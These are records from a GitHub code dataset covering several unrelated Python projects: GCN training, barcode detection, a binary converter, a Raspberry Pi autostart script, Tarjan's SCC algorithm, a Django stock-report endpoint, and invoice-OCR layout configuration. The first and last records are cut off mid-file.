test_node_num)\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parser.parse_args()\r\n args.cuda = not args.no_cuda and torch.cuda.is_available()\r\n data_name = args.data_name\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed)\r\n if args.cuda:\r\n torch.cuda.manual_seed(args.seed)\r\n\r\n features, query_num, ground_truth, adjs, node_max, masks, train_idx_list, query_node_num, data_node_num = load_data(data_name = data_name)\r\n model = GCN(nfeat=args.emb_size,\r\n nhid=args.hidden,\r\n nclass=args.gcn_out,\r\n dropout=args.dropout)\r\n\r\n extract_model = NN(nfeat=features.shape[1], nhid=args.emb_size)\r\n \r\n renn_model = RENN(nclass=args.gcn_out,nfeat=features.shape[1])\r\n\r\n trans = transformation(args.gcn_out)\r\n \r\n optimizer = optim.Adam(itertools.chain(extract_model.parameters(), model.parameters(), trans.parameters()),\r\n lr=args.lr, weight_decay=args.weight_decay)\r\n \r\n renn_optimizer = optim.Adam(renn_model.parameters(),\r\n lr=args.re_lr, weight_decay=args.weight_decay)\r\n\r\n wdiscriminator = WDiscriminator(args.gcn_out)\r\n optimizer_wd = torch.optim.Adam(wdiscriminator.parameters(), lr=args.lr_wd, weight_decay=5e-4)\r\n\r\n start_train(query_num, ground_truth, adjs, node_max, masks, train_idx_list, query_node_num, data_node_num)\r\n print('dataset:',data_name)\r\n \r\n","repo_name":"yujianke100/NSS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"41676566991","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nfrom cv2 import waitKey\r\nfrom cmath import sqrt, phase\r\nfrom itertools import groupby\r\nfrom 
collections import Counter\r\nimport math\r\n\r\n#device=0\r\n#cap=cv2.VideoCapture(device)\r\ndef detect_CB(cap):\r\n \r\n ret, dst = cap.read()\r\n code_barre=\"NULL\"\r\n if ret==True:\r\n gray = cv2.cvtColor(dst,cv2.COLOR_BGR2GRAY)\r\n height, width = gray.shape[:2]\r\n lines=detect_lines(gray) \r\n if (lines is not None) and len(lines[0])>4 :\r\n coord=[]\r\n for x1,y1,x2,y2 in lines[0]:\r\n norme=abs(sqrt((x1-x2)^2+(y1-y2)^2))\r\n if norme!=0 :\r\n x0=(x1-x2)/norme\r\n x0=int(x0)\r\n y0=(y1-y2)/norme\r\n y0=int(y0)\r\n coord.append([x0,y0])\r\n \r\n #print(\"coord=\"+str(coord))\r\n coord.sort(cmp=None, key=None, reverse=False)\r\n #print(\"coord=\"+str(coord))\r\n \r\n listMax=[len(list(group)) for key, group in groupby(coord)]\r\n #print(\"listMax=\"+str(listMax))\r\n \r\n inde=listMax.index(max(listMax))\r\n \r\n c=0\r\n for i in range(inde) :\r\n c=c+listMax[i]\r\n \r\n vect=coord[c+1]\r\n \r\n angle=math.degrees(-np.pi/2+phase(complex(vect[0],vect[1])))\r\n #print(-np.pi/2+phase(complex(vect[0],vect[1])))\r\n #print(round(angle))\r\n M=cv2.getRotationMatrix2D((width/2,height/2),round(angle),1.0)\r\n dst = cv2.warpAffine(dst,M,(width,height))\r\n \r\n \r\n \r\n \r\n filename='img_modifie.png'\r\n cv2.imwrite(filename,dst)\r\n commande='zbarimg '+filename\r\n #print(commande)\r\n code_barre=os.popen(commande).read()\r\n code_barre=str(code_barre)\r\n i=-1\r\n i=code_barre.rfind('EAN-13:')\r\n #print(\"i=\"+str(i))\r\n if i!=-1 :\r\n \r\n #print(code_barre)\r\n code_barre=code_barre.replace('EAN-13:','')\r\n #print(\"length=\"+str(len(code_barre)))\r\n #if code_barre[len(code_barre)-1]==\"\\0\":\r\n code_barre=code_barre[:len(code_barre)-1]\r\n #print(code_barre)\r\n if checksum(code_barre)==False:\r\n code_barre=\"NULL\"\r\n \r\n #time.sleep(3)\r\n else:\r\n i=code_barre.rfind('EAN-8:')\r\n if i!=-1 :\r\n code_barre=code_barre.replace('EAN-8:','')\r\n # if code_barre[len(code_barre)-1]==\"\\0\":\r\n code_barre=code_barre[:len(code_barre)-1]\r\n if checksum(code_barre)==False:\r\n code_barre=\"NULL\"\r\n else :\r\n code_barre=\"NULL\"\r\n #time.sleep(3)\r\n return code_barre \r\n \r\n \r\ndef detect_lines(gray):\r\n \r\n edges2 = cv2.Canny(gray,150,150,apertureSize = 3)\r\n minLineLength = 100\r\n maxLineGap = 40\r\n lines = cv2.HoughLinesP(edges2,1,np.pi/360,90,minLineLength,maxLineGap)\r\n return lines \r\n\r\ndef checksum(cdb):\r\n x=0\r\n y=0\r\n z=0\r\n i=0\r\n a=0\r\n leng=len(cdb)\r\n #print(cdb)\r\n last_number=int(cdb[leng-1])\r\n while i= 2:\n valid = False\n break\n except:\n valid = False\n break \n \n while valid == False:\n c = 0\n print(\"\\nPlease put in a valid binary number\")\n binary = input(\"Please put in a binary number to be converted:\\t\")\n for no in binary:\n try:\n if int(no) >= 2:\n valid = False\n break\n else:\n c += 1\n except:\n valid = False\n break\n \n if c == len(binary):\n valid = True\n \n rank = []\n for ind, no in enumerate(binary):\n rank.append(no)\n rank.append(int((len(binary)-ind) -1))\n \n result = 0\n for ind, no in enumerate(rank):\n if ind == 0 or ind%2 == 0:\n result += int(int(no) * 2) ** int(rank[ind+1])\n else:\n continue\n \n print(result)\n \n \nelse:\n number = input(\"\\nPlease put in a number to be converted to binary\\n\")\n while True:\n try:\n int(number)\n break\n except:\n print(\"\\nPlease put in a valid integer\")\n number = input(\"Please put in a number to be converted to binary\\n\")\n \n rem_list = []\n while int(number) >= 2:\n rem = int(number)%2\n number = int(number)//2\n rem_list.append(rem)\n 
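# e.g. number=13: the loop collects remainders [1, 0, 1] and leaves quotient 1, which is appended below; read in reverse this gives 1101, the binary form of 13\n    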
rem_list.append(number)\n \n result = 0\n for t in range(len(rem_list)):\n if result == 0:\n result = f\"{rem_list[-(t+1)]}\"\n else:\n result = f\"{result}{rem_list[-(t+1)]}\"\n \n print(result)\n\n","repo_name":"OlascoWorks/Binary-calculator","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9858472274","text":"import os\nimport subprocess\n\n# Run the whoami command\noutput = subprocess.check_output([\"whoami\"])\n\n# Decode the output from bytes to string\nusername = output.decode().strip()\n\n# Store the username in a variable\ncurrent_user = username\n\n# Open bashrc file in append mode\nwith open(os.path.expanduser(\"~/.bashrc\"), \"a\") as bashrc_file:\n # Append current user to the file\n bashrc_file.write(f\"\\n sudo python3 /home/{current_user}/influx_query.py\")","repo_name":"WantClue/Pi-Zero-Solar","sub_path":"influxdb-LCD-bootable.py","file_name":"influxdb-LCD-bootable.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12866586250","text":"import sys\n\ndef SCCUtil(u, low_key, number, stackMember, st, index, graph, toFind):\n number[u] = index\n low_key[u] = index\n index += 1\n stackMember[u] = True\n st.append(u)\n for v in graph[u]:\n if number[v] == -1:\n SCCUtil(v, low_key, number, stackMember, st, index, graph, toFind)\n low_key[u] = min(low_key[u], low_key[v])\n elif stackMember[v] == True:\n low_key[u] = min(low_key[u], number[v])\n w = -1\n res = []\n isFound = False\n if low_key[u] == number[u]:\n while w != u:\n w = st.pop()\n if toFind == w:\n isFound = True\n res.append(w)\n stackMember[w] = False\n print(res)\n \ndef SCC(size, graph, toFind):\n number = [-1] * size\n low_key = [-1] * size\n stackMember = [False] * size\n st = []\n index = 0\n for i in range(size):\n if number[i] == -1:\n SCCUtil(i, low_key, number, stackMember, st, index, graph, toFind)\n\nif __name__ == \"__main__\":\n vertices = int(input())\n edges = int(input())\n adj_list = [set() for _ in range(vertices)]\n for _ in range(edges):\n edge = [int(x) for x in input().split()]\n adj_list[edge[0]].add(edge[1])\n toFind = int(input())\n print(adj_list)\n print(\"ToFind =\", toFind)\n SCC(vertices, adj_list, toFind)","repo_name":"tyao117/AlgorithmPractice","sub_path":"Tarjans_modified/Tarjans.py","file_name":"Tarjans.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39259195686","text":"import logging\nimport time\n\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.utils.urls import replace_query_param\nfrom rest_framework.views import APIView\n\nfrom eums.api.filter.filter_mixin import RequestFilterMixin\nfrom eums.api.sorting.standard_dic_sort import StandardDicSort\nfrom eums.models import DistributionPlanNode, DistributionPlan, Flow\nfrom eums.permissions.stock_report_permissions import StockReportPermissions\n\nPAGE_SIZE = 10\nsort = StandardDicSort('last_shipment_date', 'last_received_date',\n 'total_value_received', 'total_value_dispensed', 'total_value_lost', 'balance')\n\nmixin = RequestFilterMixin()\n\nlogger = logging.getLogger(__name__)\n\n\nclass StockReport(APIView):\n permission_classes = 
(StockReportPermissions,)\n\n def get(self, request):\n reduced_stock_report = filter_stock_report(request)\n totals = _compute_totals(reduced_stock_report)\n reduced_stock_report = sort.sort_by(request, reduced_stock_report)\n paginated_results = Paginator(reduced_stock_report, PAGE_SIZE)\n\n page_number = _get_page_number(request)\n results_current_page = paginated_results.page(page_number)\n\n data = {\n 'next': _has_page(results_current_page.has_next(), _get_page_number(request) + 1, request),\n 'previous': _has_page(results_current_page.has_previous(), _get_page_number(request) - 1, request),\n 'count': len(reduced_stock_report),\n 'pageSize': PAGE_SIZE,\n 'results': results_current_page.object_list,\n 'totals': totals\n }\n\n return Response(data, status=status.HTTP_200_OK)\n\n\ndef filter_stock_report(request):\n consignee_id = request.GET.get('consignee')\n location = request.GET.get('location')\n outcome_id = request.GET.get('outcome')\n from_date = request.GET.get('fromDate')\n to_date = request.GET.get('toDate')\n\n stock_report = _build_stock_report(consignee_id, location, outcome_id, from_date, to_date)\n reduced_stock_report = _reduce_stock_report(stock_report)\n return reduced_stock_report\n\n\ndef _build_stock_report(consignee_id, location, outcome_id, from_date, to_date):\n ip_nodes = DistributionPlanNode.objects.filter(\n Q(tree_position=Flow.Label.IMPLEMENTING_PARTNER) &\n (\n Q(distribution_plan__track=True) |\n (\n Q(distribution_plan__track=False) & Q(distribution_plan__is_auto_track_confirmed=True)\n )\n )\n )\n\n mixin.supported_filters = {\n \"consignee_id\": \"consignee_id\",\n \"location\": \"location__icontains\",\n \"outcome_id\": \"programme_id\",\n \"from_date\": \"delivery_date__gte\",\n \"to_date\": \"delivery_date__lte\"\n }\n filters = mixin.build_filters(\n {'consignee_id': consignee_id, 'location': location,\n 'outcome_id': outcome_id, 'from_date': from_date, 'to_date': to_date})\n\n ip_nodes = ip_nodes.filter(**filters)\n return reduce(_aggregate_nodes_into_stock_report, ip_nodes, [])\n\n\ndef _aggregate_nodes_into_stock_report(stock_report, node):\n if node.item:\n stock_report.append(_get_report_details_for_node(node))\n return stock_report\n\n\ndef _get_report_details_for_node(node):\n purchase_order_number = node.item.number()\n quantity_received = _compute_quantity_received(node)\n total_value_received = quantity_received * node.item.unit_value()\n quantity_lost = node.total_amount_lost()\n total_value_lost = quantity_lost * node.item.unit_value()\n remark_lost = node.total_lost_remark()\n quantity_dispensed = node.quantity_out()\n value_dispensed = quantity_dispensed * node.item.unit_value()\n ip_delivery = DistributionPlan.objects.get(pk=node.distribution_plan.id)\n\n received_date = ip_delivery.received_date()\n\n quantity_in = node.quantity_in()\n\n result = {'document_number': purchase_order_number, 'programme': node.programme.name,\n 'last_shipment_date': str(node.delivery_date), 'last_received_date': str(received_date),\n 'total_value_received': total_value_received, 'total_value_dispensed': value_dispensed,\n 'total_value_lost': total_value_lost,\n 'balance': (total_value_received - value_dispensed - total_value_lost), 'items': [\n {'code': node.item.item.material_code, 'description': node.item.item.description, 'location': node.location,\n 'consignee': node.consignee.name, 'quantity_delivered': quantity_in,\n 'date_delivered': str(node.delivery_date), 'quantity_confirmed': quantity_received,\n 'date_confirmed': str(received_date), 
'quantity_dispatched': quantity_dispensed,\n 'quantity_lost': quantity_lost, 'remark_lost': remark_lost,\n 'balance': quantity_received - quantity_dispensed - quantity_lost}]}\n return result\n\n\ndef _get_responses(node):\n latest_run = node.latest_run()\n if latest_run:\n return latest_run.questions_and_responses()\n return {}\n\n\ndef _compute_quantity_received(node):\n responses = _get_responses(node)\n return responses.get('amountReceived', 0)\n\n\ndef _get_date_received(node):\n responses = _get_responses(node)\n return responses.get('dateOfReceipt', '')\n\n\ndef _reduce_stock_report(stock_report):\n reduced_report = []\n for report_item in stock_report:\n matching_report_item = _find_item_in_stock_report(reduced_report, report_item)\n if matching_report_item:\n _update_report_item(matching_report_item, report_item)\n else:\n reduced_report.append(report_item)\n return sorted(reduced_report, key=lambda d: d.get('last_shipment_date'), reverse=True)\n\n\ndef _compute_totals(stock_report):\n total_received = round(\n reduce(lambda total, report_item: total + report_item['total_value_received'], stock_report, 0), 2)\n total_dispensed = round(\n reduce(lambda total, report_item: total + report_item['total_value_dispensed'], stock_report, 0), 2)\n total_lost = round(reduce(lambda total, report_item: total + report_item['total_value_lost'], stock_report, 0), 2)\n total_left = round(total_received - total_dispensed - total_lost, 2)\n\n return {\n 'total_received': total_received,\n 'total_dispensed': total_dispensed,\n 'total_lost': total_lost,\n 'balance': total_left\n }\n\n\ndef _find_item_in_stock_report(reduced_report, report_item):\n for item in reduced_report:\n if item['document_number'] == report_item['document_number']:\n return item\n return None\n\n\ndef _update_report_item(matching_report_item, report_item):\n matching_report_item['total_value_received'] = matching_report_item['total_value_received'] + report_item[\n 'total_value_received']\n matching_report_item['total_value_dispensed'] = matching_report_item['total_value_dispensed'] + report_item[\n 'total_value_dispensed']\n matching_report_item['total_value_lost'] = matching_report_item['total_value_lost'] + report_item[\n 'total_value_lost']\n matching_report_item['balance'] = matching_report_item['total_value_received'] - matching_report_item[\n 'total_value_dispensed'] - matching_report_item['total_value_lost']\n matching_report_item['items'].append(report_item['items'][0])\n\n if matching_report_item['last_shipment_date'] < report_item['last_shipment_date']:\n matching_report_item['last_shipment_date'] = report_item['last_shipment_date']\n\n\ndef _get_page_number(request):\n if request.GET.get('page'):\n return int(request.GET.get('page'))\n else:\n return 1\n\n\ndef _has_page(has_page, page, request):\n base_url = replace_query_param(request.build_absolute_uri(), 'page', page)\n return None if has_page is False else base_url\n","repo_name":"unicefuganda/eums","sub_path":"eums/api/stock_report/stock_report_endpoint.py","file_name":"stock_report_endpoint.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"3835825895","text":"\"\"\"Unit test package for web3data.\"\"\"\n\nfrom web3data.chains import Chains\n\nAPI_PREFIX = \"https://web3api.io/api/v2/\"\nHEADERS = {\"foo\": \"bar\", \"baz\": \"qux\"}\nRESPONSE = {\"test\": \"data\"}\nCHAINS = (\n Chains.BTC,\n Chains.BCH,\n Chains.BSV,\n Chains.ETH,\n Chains.ETH_RINKEBY,\n 
Chains.LTC,\n Chains.ZEC,\n)\n","repo_name":"dmuhs/web3data-py","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"39838336660","text":"#page_res = [4134,5846]\n\n# ####### (1918, 1050)\n\n\ncoordinates_1 = [[(229, 264), (1938, 1059)],[(465, 1470), (1743, 550)],[(2172, 11), (1844, 1212)],[(3503, 1852), (477, 1259)],[(2312, 822), (1568, 341)]]\ncoordinates_1 = [['Dodavatel:', [4,5]],[(465, 1470), (1743, 550)],[(2172, 11), (1844, 1212)],[(3503, 1852), (477, 1259)]]\n\n\n\nlayout_1 = [[\n\n {\"title\": \"NaSupRe\", \"key\" : \"Dodavatel:\", \"dist\": \"IČ:\"},\n {\"title\": \"INSuRe\", \"key\" : \"IČ:\", \"dist\": \"_next_\"},\n {\"title\": \"'TIDSupRe\", \"key\" : \"'DIČ:\", \"dist\": \"_next_\"},\n {\"title\": \"Telefon\", \"key\" : \"Telefon:\", \"dist\": \"Mobil:\"},\n {\"title\": \"Mobil\", \"key\" : \"Mobil:\", \"dist\": \"Fax:\"},\n {\"title\": \"Fax\", \"key\" : \"Fax:\", \"dist\": \"_next_\"},\n {\"title\": \"EmAdr\", \"key\" : \"E-mail:\", \"dist\": 1},\n\n\n],\n[\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"PayDay\", \"key\" : \"splatnosti:\", \"dist\": \"_next_\"},\n {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n],\n[\n {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n {\"title\": \"NaUseTy\", \"key\" : \"DIČ:\" , \"dist\" : [2,'_line_'] },\n {\"title\": \"AddUseTy\", \"key\" : \"DIČ:\" , \"dist\" : [2,'_rest_'] },\n \n],\n[ \n {\"title\": \"ToInv\", \"key\" : '-' , \"dist\" : {\"LINE\":-1}},\n \n],\n\n]\n\n\n\n############\n\ncoordinates_2 = [[(341, 175), (1866, 1650)],[(2172, 183), (1830, 1584)]]\n\n\nlayout_2 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : \"Dodavatel:\", \"dist\": [5,\"_line_\"]},\n {\"title\": \"INSuRe\", \"key\" : \"IČ:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"IČ:\", \"dist\": \"3\"},\n {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [4,'Bankovní'] },\n {\"title\": \"BaAcSupRe\", \"key\" : \"Banka:\", \"dist\": \"IBAN/SWIFT:\" },\n {\"title\": \"IBNSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"_next_\"},\n {\"title\": \"BICSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"3\"},\n\n\n ],\n\n[\n {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"PayDay\", \"key\" : \"splatnosti:\", \"dist\": \"_next_\"},\n {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n \n],\n\n]\n\n#############################################################\ncoordinates_3 = [[(200, 17), (1095, 403)],[(1471, 140), (595, 306)],[(1996, 131), (1305, 262)],[(3056, 393), (815, 394),],\n[(2000, 
402), (1857, 1619)],[(1716, 2677), (464, 884)]]\n\n\nlayout_3 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : 0 , \"dist\": [1,\"_line_\"]},\n {\"title\": \"AddUseTy\", \"key\" : 0 , \"dist\" : [1,\"_rest_\"] },\n\n # {\"title\": \"TIDSupRe\", \"key\" : \"IČ:\", \"dist\": \"3\"},\n # {\"title\": \"BaAcSupRe\", \"key\" : \"Banka:\", \"dist\": \"IBAN/SWIFT:\" },\n # {\"title\": \"IBNSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"_next_\"},\n # {\"title\": \"BICSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"3\"},\n # {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n\n\n ],\n\n [ \n {\"title\": \"INSuRe\", \"key\" : \"IČ:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"DIČ:\", \"dist\": \"_next_\"},\n # {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n # {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n # {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n # {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n # {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n # {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n # {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n # {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n # {\"title\": \"PayDay\", \"key\" : \"splatnosti:\", \"dist\": \"_next_\"},\n # {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n \n ],\n\n [\n {\"title\": \"Telefon\", \"key\" : \"tel.:\", \"dist\": \"_next_\"},\n {\"title\": \"Mobil\", \"key\" : \"mobil:\", \"dist\": \"_next_\"},\n {\"title\": \"Fax\", \"key\" : \"fax:\", \"dist\": \"_next_\"},\n {\"title\": \"EmAdr\", \"key\" : \"email:\", \"dist\": \"_next_\"},\n ],\n\n [\n {\"title\": \"InNum\", \"key\" : 0 , \"dist\": [1,\"_next_\"]}\n ],\n\n [\n {\"title\": \"NaCusTy\", \"key\" : \"Odběratel\" , \"dist\" : '_line_' },\n {\"title\": \"AdCus\", \"key\" : \"Odběratel\" , \"dist\" : \"IČ:\"},\n {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n\n ],\n \n [\n {\"title\": \"ToInv\", \"key\" : '-' , \"dist\" : {\"LINE\":-1}},\n ]\n\n]\n\n############\n\ncoordinates_4 = [[(2758, 8), (1314, 1532)],[(1278, 673), (1542, 849)],[(324, 113), (989, 1427)],[(2732, 4559), (1279, 753)],\n [(2732, 4559), (1279, 753)]]\n\n\nlayout_4 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : \"Dodavatel:\", \"dist\": [1,\"_line_\"]},\n {\"title\": \"AddUseTy\", \"key\" : \"Dodavatel:\" , \"dist\" : [1,'IČO:'] },\n {\"title\": \"INSuRe\", \"key\" : \"IČO:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"DIČ:\", \"dist\": \"_next_\"},\n {\"title\": \"BaAcSupRe\", \"key\" : \"účet\", \"dist\": \"2\" },\n {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"Telefon\", \"key\" : \"Telefony:\", \"dist\": \"_rest_\"},\n\n\n\n\n ],\n\n[\n {\"title\": \"PayDay\", \"key\" : \"SPLATNOSTI:\", \"dist\": \"_next_\"},\n {\"title\": \"ToInv\", \"key\" : \"ÚHRADĚ:\" , \"dist\" : \"DATUM\" },\n {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n# {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n# {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n# {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : 
'_next_' },\n# {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n# {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n# {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n# {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n \n],\n [\n {\"title\": \"NaCusTy\", \"key\" : \"Odběratel\" , \"dist\" : [2,'_line_'] },\n {\"title\": \"AdCus\", \"key\" : \"Odběratel\" , \"dist\" : [2,'IČO:']},\n {\"title\": \"INUseTy\", \"key\" : \"IČO:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' }, \n {\"title\": \"BaAcSupAc\", \"key\" : \"Bankovní\" , \"dist\" : '2' },\n ],\n\n [\n {\"title\": \"ToInv\", \"key\" : \"úhradě\" , \"dist\" : \"_rest_\", \"preprocessor\" : \"_num_\", \"postprocessor\" : \"_test_\"},\n\n ]\n]\n############\n\ncoordinates_5 = [[(0, 26), (1973, 1129)],[(5, 1794), (1990, 1171)],[(1965, 223), (2066, 2777)],[(2413, 8130), (1495, 765)]]\n\n\nlayout_5 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : \"Dodává:\", \"dist\": \"_line_\"},\n {\"title\": \"AddUseTy\", \"key\" : \"Dodává:\" , \"dist\" : \"Tel/Fax:\" },\n {\"title\": \"INSuRe\", \"key\" : \"IČO:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"DIČ:\", \"dist\": \"_next_\"},\n # {\"title\": \"BaAcSupRe\", \"key\" : \"účet\", \"dist\": \"2\" },\n # {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n # {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n # {\"title\": \"Telefon\", \"key\" : \"Telefony:\", \"dist\": \"_rest_\"},\n\n\n\n\n ],\n\n [\n {\"title\": \"AddUseTy\", \"key\" : \"zboží/služby:\" , \"dist\" : \"GLN:\" },\n\n# {\"title\": \"PayDay\", \"key\" : \"SPLATNOSTI:\", \"dist\": \"_next_\"},\n# {\"title\": \"ToInv\", \"key\" : \"ÚHRADĚ:\" , \"dist\" : \"DATUM\" },\n# {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n# {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n# {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n# {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n# {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n# {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n # {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n\n \n ],\n [\n {\"title\": \"InNum\", \"key\" : \"FAKTURY/VARIABILNÍ\" , \"dist\" : '2' },\n {\"title\": \"BaAcSupAc\", \"key\" : \"Banka:\" , \"dist\" : 'Konstantní' },\n {\"title\": \"VaSym\", \"key\" : \"FAKTURY/VARIABILNÍ\" , \"dist\" : '2' },\n {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '_next_' },\n {\"title\": \"NaCusTy\", \"key\" : \"dokladu:\" , \"dist\" : \"Splatnost\" },\n # {\"title\": \"AdCus\", \"key\" : \"Odběratel\" , \"dist\" : [2,'IČO:']},\n # {\"title\": \"INUseTy\", \"key\" : \"IČO:\" , \"dist\" : '_next_' },\n # {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n {\"title\": \"PayDay\", \"key\" : \"Splatnost\", \"dist\": \"2\"},\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n \n ],\n\n [\n {\"title\": \"ToInv\", \"key\" : \"ÚHRADĚ\" , \"dist\" : \"_rest_\"},\n ]\n\n \n]\n\n################################################################\nlist_of_layouts = 
[layout_1,layout_2,layout_3,layout_4,layout_5]\nlist_of_coordinates = [coordinates_1,coordinates_2,coordinates_3,coordinates_4,coordinates_5]\npage_res = [[4134,5846],[4134,5846],[4134,5846],[4134,5846],[4132,11696]]\n\n\ndef segmap(layout_query):\n    \n    for counter, layout in enumerate(list_of_layouts):\n        if layout_query == (counter+1):\n            return layout\n    \n    return -1\n\ndef scaler(base_res,new_res,input_list):\n    new_list = []\n    \n    x_ratio = new_res[0] / base_res[0]\n    y_ratio = new_res[1] / base_res[1]\n\n    invert = False\n\n    for item in input_list:\n        if isinstance(item[0][1], str) and isinstance(item[0][0], str) and isinstance(item[0],tuple):\n            invert = True\n\n        x = int( x_ratio * int(item[0][0]) ) if isinstance(item[0],tuple) else item[0]\n        y = int( y_ratio * int(item[0][1]) ) if isinstance(item[0],tuple) else None\n\n        # precenage_coffecies_w = 1 if not isinstance(item[1],list) else item[1][0]\n        # precenage_coffecies_h = 1 if not isinstance(item[1],list) else item[1][1]\n\n        if isinstance(item[1],list): # height and width were based on percentages\n            